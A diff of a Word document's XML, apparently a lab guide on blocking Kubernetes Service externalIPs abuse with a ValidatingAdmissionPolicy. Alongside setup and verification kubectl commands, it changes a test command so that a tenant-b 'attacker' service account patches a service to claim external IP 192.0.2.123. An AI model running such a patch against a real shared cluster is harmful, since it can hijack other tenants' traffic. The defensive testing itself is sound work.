-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kubectl </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -10998,27 +10167,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>clusterrolebinding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> security-admin-cluster-admin \</w:t>
+        <w:t xml:space="preserve"> clusterrolebinding security-admin-cluster-admin \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11038,27 +10187,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>clusterrole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>=cluster-admin \</w:t>
+        <w:t xml:space="preserve">  --clusterrole=cluster-admin \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11078,37 +10207,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>security-</w:t>
+        <w:t xml:space="preserve">  --serviceaccount=security-</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -11130,7 +10229,6 @@
         </w:rPr>
         <w:t>-admin</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11153,57 +10251,308 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> auth can-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> create </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>validatingadmissionpolicies</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl auth can-i create validatingadmissionpolicies \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --as=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system:serviceaccount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:security-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>admin:security</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --type=merge \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>p '{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"spec</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"externalIPs</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":null</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}}' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  --as=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system:serviceaccount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:security-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>admin:security</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl apply -f deny-service-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>externalips.yaml</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11233,7 +10582,6 @@
         </w:rPr>
         <w:t xml:space="preserve">  --as=</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -11274,7 +10622,6 @@
         </w:rPr>
         <w:t>-admin</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11297,45 +10644,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b patch service hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> \</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl get validatingadmissionpolicy</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11355,6 +10671,57 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>kubectl get validatingadmissionpolicybinding</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve">  --type=merge \</w:t>
       </w:r>
     </w:p>
@@ -11415,19 +10782,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>externalIPs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>"externalIPs</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -11436,7 +10792,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>":null</w:t>
+        <w:t>":[</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -11446,7 +10802,27 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>}}' \</w:t>
+        <w:t>"192.0.2.123</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"]}}</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11454,8 +10830,6 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -11468,7 +10842,6 @@
         </w:rPr>
         <w:t xml:space="preserve">  --as=</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -11487,7 +10860,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>:security-</w:t>
+        <w:t>:tenant-</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -11497,27 +10870,15 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>admin:security</w:t>
+        <w:t>b:attacker</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -11527,469 +10888,7 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apply -f deny-service-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>externalips.yaml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  --as=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>system:serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:security-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>admin:security</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> get </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>validatingadmissionpolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
